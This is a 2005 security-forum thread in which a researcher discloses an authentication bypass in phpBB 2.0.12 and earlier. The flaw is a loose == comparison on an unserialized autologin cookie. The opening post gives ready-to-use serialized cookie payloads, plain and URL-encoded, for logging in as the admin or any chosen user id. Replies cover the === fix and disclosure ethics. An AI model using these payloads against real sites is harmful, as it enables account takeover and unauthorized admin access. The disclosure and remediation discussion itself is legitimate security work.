Waraxe IT Security Portal
Login or Register
November 25, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 45
Members: 0
Total: 45
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpbb v. 2.0.12 and earlier authendication bypass Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
phpbb v. 2.0.12 and earlier authendication bypass
PostPosted: Sat Feb 26, 2005 11:20 pm Reply with quote
Heintz
Valuable expert
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




Bug author: Heintz (Henno Joosep)
Related site: http://www.waraxe.us
Date of finding: 24.02.2005

problem is in sessions.php which is in /includes catalog.

$sessiondata = isset($HTTP_COOKIE_VARS[$cookiename . '_data']) ? unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data'])) : array();

here we see an array unserialized

if( $sessiondata['autologinid'] == $auto_login_key )
{
// autologinid matches password
$login = 1;
$enable_autologin = 1;
}


problem is with if() using == operator which considers the statement
true if one side is boolean(true), and that we can achive by unserializing
a bool instead of empty string.

exploitation:
this can be normal admin session cookie.
a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"2";}

attacker would make array with autologinid as key to boolean(tru) so:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

to this to work in real situation it must be urlencoded, and this is how it should look like to
obtain a user with id 2 (usually admin):
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D


to change the users id bigger, change the
number in end,

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"7";}

if dealing with higher ids you must specify s:N (N as how many decimal places id has)
example below:

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:4:"1234";}

i stated using "===" as contitional operator as a "quick fix", which phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).

originaly i tryed/explored advantages to use unserialize
to unserialize database objects, but using objects as arrays creates fatal error
(possible full path disclosure???).

Notes:
software authors decided to not to credit me cause i posted info public,
not giving them enought time,

-- brought up --


Last edited by Heintz on Sat Apr 09, 2005 5:46 pm; edited 4 times in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sun Feb 27, 2005 3:32 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




Smile Very Happy full test and work perfect exellent work
View user's profile Send private message Visit poster's website
PostPosted: Sun Feb 27, 2005 5:28 pm Reply with quote
Injector
Active user
Active user
Joined: Dec 29, 2004
Posts: 49




i decoded both and tried to analyze it but still i dont get how to do it. What if I dont want user id 2 what if I want user id 7. How do i do such?
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 12:31 am Reply with quote
Grullanetx
Beginner
Beginner
Joined: Feb 18, 2005
Posts: 2




Hi all!

phpBB 2.0.13 released - Critical Update

path disclosure bug in viewtopic.php fixed too!

Saludos!
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 4:37 am Reply with quote
Exoduks
Beginner
Beginner
Joined: Jan 12, 2005
Posts: 3




Does anyone now how to exploit this session hendeling bug ?
View user's profile Send private message Visit poster's website
PostPosted: Mon Feb 28, 2005 5:13 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




hum, nice research youve done there

ive try to download that version, but the development team allready update it Smile

now i try a new one (2.0.13)

long time no play with PHPbb Smile (eventhough my forum ise it too Sad )

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
For comparing Strings use ===
PostPosted: Mon Feb 28, 2005 8:40 am Reply with quote
Zeelock
Active user
Active user
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




Heintz Great Job.

Even if it's a common trick and well documented I didn't notice it yet ( Shocked ).

This error is very common in converting perl scripts into php.

For more info:

http://www.php.net/manual/it/language.operators.comparison.php

Quote:
jwhiting at hampshire dot edu
09-Dec-2003 06:31
note: the behavior below is documented in the appendix K about type comparisons, but since it is somewhat buried i thought i should raise it here for people since it threw me for a loop until i figured it out completely.

just to clarify a tricky point about the == comparison operator when dealing with strings and numbers:

('some string' == 0) returns TRUE

however, ('123' == 0) returns FALSE

also note that ((int) 'some string') returns 0

and ((int) '123') returns 123

the behavior makes senes but you must be careful when comparing strings to numbers, e.g. when you're comparing a request variable which you expect to be numeric. its easy to fall into the trap of:

if ($_GET['myvar']==0) dosomething();

as this will dosomething() even when $_GET['myvar'] is 'some string' and clearly not the value 0

i was getting lazy with my types since php vars are so flexible, so be warned to pay attention to the details...


Exploit n. 2 Censored.....


Last edited by Zeelock on Mon Feb 28, 2005 1:54 pm; edited 6 times in total

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 10:37 am Reply with quote
sygma
Regular user
Regular user
Joined: Nov 21, 2004
Posts: 7




why was the info censored ? could someone please PM the info ? thanks.

_________________
[i]no word to save thee[/i]
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 11:03 am Reply with quote
Zeelock
Active user
Active user
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




I think that Janek censored the message, because it's really harmful at the moment

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 1:51 pm Reply with quote
Heintz
Valuable expert
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




i was the one censoring it, cause phpbb guys didn't like the idea posting before/same time about the issue.

and i would appreciate if we do not provide explotation info in some ammount of time (2 days).

i thought of better of people but it seems there just too many script kiddies outside who start making damage whenever possible. Sad


http://www.phpbb.com/phpBB/viewtopic.php?t=267563


Last edited by Heintz on Mon Feb 28, 2005 3:37 pm; edited 1 time in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Feb 28, 2005 1:53 pm Reply with quote
Zeelock
Active user
Active user
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




If you want I'll censor the info as well

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Thu Mar 03, 2005 1:05 pm Reply with quote
Heintz
Valuable expert
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




---move---

Notes:
software authors decided to not to credit me cause i posted info public,
not giving them enought time,


Last edited by Heintz on Wed May 04, 2005 1:26 am; edited 2 times in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Thu Mar 03, 2005 2:23 pm Reply with quote
lone_wolf
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 9




Heintz, what exactly triple equal from "quick fix" do? Is there some way to cheat it?
View user's profile Send private message
PostPosted: Thu Mar 03, 2005 2:39 pm Reply with quote
lone_wolf
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 9




This looks pritty hopeless (from "Boolean - manual):


/* Note the triple equal sign, this is the "exactly equal to" operator,
which checks NOT JUST FOR EQUALITY, BUT FOR TYPE. Using it
ensures that $bool doesn't get converted to a boolean
for the comparison: $bool===true is only true
if $bool is a true boolean, whereas $bool==true
is true for any non-empty string (except "0").
*/
View user's profile Send private message
PostPosted: Sun Mar 13, 2005 4:42 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




Heintz wrote:

<-- message truncated --->

i stated using "===" as contitional operator as a "quick fix", which phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).

originaly i tryed/explored advantages to use unserialize
to unserialize database objects, but using objects as arrays creates fatal error
(possible full path disclosure???).

Notes:
software authors decided to not to credit me cause i posted info public,
thus not giving them enought time (big mistake by me), and therefore there may be stealers
claiming the bug to be theyrs.


have another way to fix it, coz i found the same error as you do

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
phpbb v. 2.0.12 and earlier authendication bypass
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.036 Seconds